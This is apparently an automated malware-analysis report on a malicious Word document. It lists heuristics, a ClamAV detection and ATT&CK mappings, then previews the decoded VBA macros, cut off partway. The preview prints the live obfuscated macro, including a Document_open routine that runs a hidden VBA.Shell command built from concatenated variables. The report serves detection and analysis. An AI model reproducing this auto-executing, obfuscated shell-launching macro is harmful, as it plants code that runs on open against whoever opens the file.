Verdict: MALICIOUS
Risk Score: 222
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious OLE document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is commonly used to download and execute additional malware. The 'Document_Open' macro and 'VBA p-code auto-exec with execution tokens' heuristics further support this, suggesting an automated execution upon opening the document. The ClamAV detection ID provides a specific identifier for this malware.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6794284-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6794284-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42003 bytes |
SHA-256 of macros.bas: fa8945136b7e856500fdffcfdc053d8d9f8a0ebcf05017db8a0c70eb6e9c6c4a
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "vUwdwkwHZAwSRz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ocDVzYTQSvXh()
On Error Resume Next
If FXzbRC <= 13 Then
ElseIf diXIu > bZOOY Then
End If
If WzikI <= 13 Then
ElseIf FEfYFq > vLSBq Then
End If
If JhpJc <= 13 Then
ElseIf KLKjWV > LiMrrJ Then
End If
If zldrbG <= 13 Then
ElseIf dwlvFS > wjvjNY Then
End If
If LvaPVj <= 13 Then
ElseIf fvLvUz > OiNrwI Then
End If
End Function
Private Function wVJSzwTVonG()
On Error Resume Next
If GGMuUf = 2 Then
wPuwmz = Clnih * PjEUjQ + 2346 + TSzqHl * (nYfVH * VmFqii + 90069 + kjDLsa + (BsLEi / cwvGf))
End If
If GfTwD = 2 Then
mrjKNE = pLVvQ * ClEffj + 46435 + wWMYU * (hiEIB * HWpplj + 88007 + LtkZqn + (RBznR / GpVWls))
End If
If ApkEzF = 2 Then
ADPXwn = jHvia * oUQpI + 97967 + ivzvQ * (LSdbc * WXCchf + 90520 + kpkbzz + (IjYvww / AFGUGa))
End If
If PNIMa = 2 Then
utzdE = Gtjjvi * LjlfT + 33149 + ssqKkz * (pXXbr * rjfCOH + 43823 + GtMzb + (AZdho / zJBDpt))
End If
If rElQAi = 2 Then
aKAlcp = ADcGdS * oYoNHw + 76762 + TdHCE * (ANrBjN * nUYqJ + 18167 + SMhdb + (CfzCt / FYrXda))
End If
End Function
Private Function VMIDtXiAj()
On Error Resume Next
If kWpBcW <= 13 Then
ElseIf HFqAY > wKizA Then
End If
If uElzi <= 13 Then
ElseIf JiVPt > mwnhic Then
End If
If CLHkj <= 13 Then
ElseIf vhtVY > PbAtYB Then
End If
If Obozrz <= 13 Then
ElseIf LvuJd > ikjWF Then
End If
End Function
Private Function TdlscjhE()
On Error Resume Next
If tpcKSn <= 13 Then
ElseIf vXIjM > KcXuzb Then
End If
If iQqmF <= 13 Then
ElseIf pAtdG > RGNfCJ Then
End If
If HKRpDQ <= 13 Then
ElseIf ScJSjX > CcnEw Then
End If
If BzlmtO <= 13 Then
ElseIf pWnYUf > komWw Then
End If
If dGWtL <= 13 Then
ElseIf KSoAiA > UXjuz Then
End If
End Function
Private Sub Document_open()
On Error Resume Next
If aCYIW <= 13 Then
ElseIf kcHaIS > iYbWX Then
End If
If hNKCGZ <= 13 Then
ElseIf sivPMj > QRZPC Then
End If
If YsZiD <= 13 Then
ElseIf CMFKR > DQWlb Then
End If
VBA.Shell "" + PbSXrfi + qTHVNsWCzur + CVar("C") + LwmPNGCH + pfzijiiLO + BQiauS + zCkuMdz + dNZQB + BKiEwb + ufwLfjRkM + HIGZziIYbYd + tHCibYq + nkficCX + VcwPNkjuUv + HhmoJWLRs + XVGSqPJmTPjc + nDMjKjzuPCXctS, 0
If QiBZb <= 13 Then
ElseIf ilpuYK > wRPwiM Then
End If
If GuqEsC <= 13 Then
ElseIf HsoQQt > bpuIdS Then
End If
If GrmdFD <= 13 Then
ElseIf NVqZWJ > mECkRF Then
End If
End Sub
Private Function qkVNKvw()
On Error Resume Next
If PaLiK <= 13 Then
ElseIf OiCTp > zAvov Then
End If
If FGzKCq <= 13 Then
ElseIf BdAdzz > KGKlTw Then
End If
If jqhrkZ <= 13 Then
ElseIf HtBVFj > iWIRvF Then
End If
If BXlZnY <= 13 Then
ElseIf mvPEL > zjVoon Then
End If
If GBVGf <= 13 Then
ElseIf mdHSwI > QoPlhS Then
End If
End Function
Private Function rWjmDqGsBSG()
On Error Resume Next
If MuajHU <= 13 Then
ElseIf CqdURK > Wbjokz Then
End If
If iqflO <= 13 Then
ElseIf jrcjT > rIKLmf Then
End If
If ikPDT <= 13 Then
ElseIf SZwil > znmin Then
End If
If DcjbMf <= 13 Then
ElseIf AiwwBn > moitJC Then
End If
If ispirf <= 13 Then
ElseIf tFECXO > QGzwjZ Then
End If
If lsuzP <= 13 Then
ElseIf zYbtL > QfGKF Then
End If
End Function
Private Function vHcBotDZ()
On Error Resume Next
If YtYwq <= 13 Then
ElseIf nvLqR > ZNftX Then
End If
If LRZMAK <= 13 Then
ElseIf TiqBfm > TPszh Then
End If
If OJsPk <= 13 Then
ElseIf VFRVw > ozKnO Then
End If
If BFWJK <= 13 Then
ElseIf jDk
... (truncated)